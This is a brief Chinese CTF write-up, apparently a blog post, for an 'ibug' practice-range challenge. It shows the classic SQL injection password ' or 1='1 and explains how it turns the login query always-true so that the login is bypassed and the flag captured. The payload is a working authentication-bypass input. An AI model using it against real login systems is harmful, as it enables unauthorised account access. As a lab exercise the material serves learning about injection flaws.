题目很明显的标注,万能密码登陆
用户名随便输
密码: ' or 1 ='1
登陆拿到flag
select name,pass from tbAdmin where name='admin' and pass='123456'
输入密码: ' or 1='1
sql语句就变成下面这个样子:
select name,pass from tbAdmin where name='admin' and pass='' or 1='1'
1='1'永远为真,所以登陆成功
ibug靶场(万能密码登陆)
©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。
